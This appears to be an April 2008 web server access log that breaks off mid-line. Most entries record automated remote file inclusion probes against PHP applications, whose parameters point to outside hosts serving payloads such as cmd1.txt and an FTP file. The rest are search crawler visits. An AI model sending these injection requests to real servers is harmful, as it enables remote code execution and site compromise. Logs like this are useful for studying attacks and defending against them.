70.84.37.242 - - [06/Apr/2008:21:21:59 -0700] "GET /index.php?dir=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
70.84.37.242 - - [06/Apr/2008:21:21:59 -0700] "GET /logs/index.php?dir=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
68.180.138.137 - - [06/Apr/2008:21:23:14 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "REAP-crawler Nutch/Nutch-1.0-dev (Reap Project; http://reap.cs.cmu.edu/REAP-crawler/; Reap Project)" "www.toulouseangloexchange.com"
68.180.138.137 - - [06/Apr/2008:21:23:15 -0700] "GET / HTTP/1.0" 200 903 "-" "REAP-crawler Nutch/Nutch-1.0-dev (Reap Project; http://reap.cs.cmu.edu/REAP-crawler/; Reap Project)" "www.toulouseangloexchange.com"
61.67.120.48 - - [06/Apr/2008:21:24:28 -0700] "GET /logs/access_080303.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:21:26:43 -0700] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:21:26:43 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:21:26:44 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.215.80.102 - - [06/Apr/2008:21:27:48 -0700] "GET /logs/access_080303.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:21:30:23 -0700] "GET /logs/access_080128.log/index.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:21:30:23 -0700] "GET /index.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
81.89.137.99 - - [06/Apr/2008:21:30:23 -0700] "GET /logs/index.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.93.107.242 - - [06/Apr/2008:21:31:10 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
69.93.107.242 - - [06/Apr/2008:21:31:10 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
74.6.18.244 - - [06/Apr/2008:21:31:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
74.6.18.115 - - [06/Apr/2008:21:31:49 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:21:32:18 -0700] "GET /logs/access_080211.log/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.135.126 - - [06/Apr/2008:21:32:18 -0700] "GET /logs/myevent.php?myevent_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.73.237 - - [06/Apr/2008:21:35:36 -0700] "GET /logs/access_080303.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 275 "